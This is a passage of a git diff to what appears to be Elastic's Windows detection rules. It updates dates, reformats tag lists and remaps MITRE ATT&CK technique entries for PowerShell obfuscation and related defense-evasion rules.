[ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,36 +92,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.002" -name = "Pass the Hash" -reference = "https://attack.mitre.org/techniques/T1550/002/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml index b21cc5070cd..0282253c16e 100644 --- a/rules/windows/defense_evasion_posh_assembly_load.toml +++ b/rules/windows/defense_evasion_posh_assembly_load.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -148,49 +148,34 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.001" -name = "Dynamic-link Library Injection" -reference = "https://attack.mitre.org/techniques/T1055/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1055.002" -name = "Portable Executable Injection" -reference = "https://attack.mitre.org/techniques/T1055/002/" - [[rule.threat.technique]] id = "T1620" name = "Reflective Code Loading" reference = "https://attack.mitre.org/techniques/T1620/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml index 1af9d0caffa..065a298153f 100644 --- a/rules/windows/defense_evasion_posh_compressed.toml +++ b/rules/windows/defense_evasion_posh_compressed.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,14 +112,7 @@ Setup instructions: https://ela.st/powershell-logging-setup This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`. """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -149,6 +142,7 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" @@ -159,29 +153,28 @@ id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_defender_tampering.toml b/rules/windows/defense_evasion_posh_defender_tampering.toml index c4d50b64d01..f0dfa740cda 100644 --- a/rules/windows/defense_evasion_posh_defender_tampering.toml +++ b/rules/windows/defense_evasion_posh_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -144,39 +144,21 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml index c5e38dabe16..6e4a932d0bc 100644 --- a/rules/windows/defense_evasion_posh_encryption.toml +++ b/rules/windows/defense_evasion_posh_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,14 +97,7 @@ This behavior can be legitimate (protecting configuration values, packaging cont risk_score = 47 rule_id = "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -140,22 +133,29 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_high_entropy.toml b/rules/windows/defense_evasion_posh_high_entropy.toml index 4519eaa5024..97903280a6b 100644 --- a/rules/windows/defense_evasion_posh_high_entropy.toml +++ b/rules/windows/defense_evasion_posh_high_entropy.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["windows"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -115,14 +115,7 @@ Setup instructions: https://ela.st/powershell-logging-setup This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`, `powershell.file.script_block_surprisal_stdev`, and `powershell.file.script_block_length`. """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -142,40 +135,39 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation.toml b/rules/windows/defense_evasion_posh_obfuscation.toml index 3f18767f36a..65d2f5c7b65 100644 --- a/rules/windows/defense_evasion_posh_obfuscation.toml +++ b/rules/windows/defense_evasion_posh_obfuscation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,14 +59,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -122,36 +115,36 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml index 98b2aa03bc7..be379bc9284 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -109,14 +109,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -167,39 +160,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml index 8f1bd286cb1..47250fb084a 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,14 +100,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -151,39 +144,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml index c138be71ed7..145c241a756 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,14 +82,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -134,39 +127,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml index 4b1409da8c8..768f4aeb483 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,14 +112,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -161,39 +154,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml index 9f3f14ce734..4bc50165fbf 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,14 +79,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -147,39 +140,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml index 68743a18154..7f5472b2a96 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -149,39 +142,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml index 7ee84b163a3..e3e40c756d6 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -163,39 +156,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml index f876139f3e3..938cd397a2b 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,14 +82,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -144,39 +137,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git 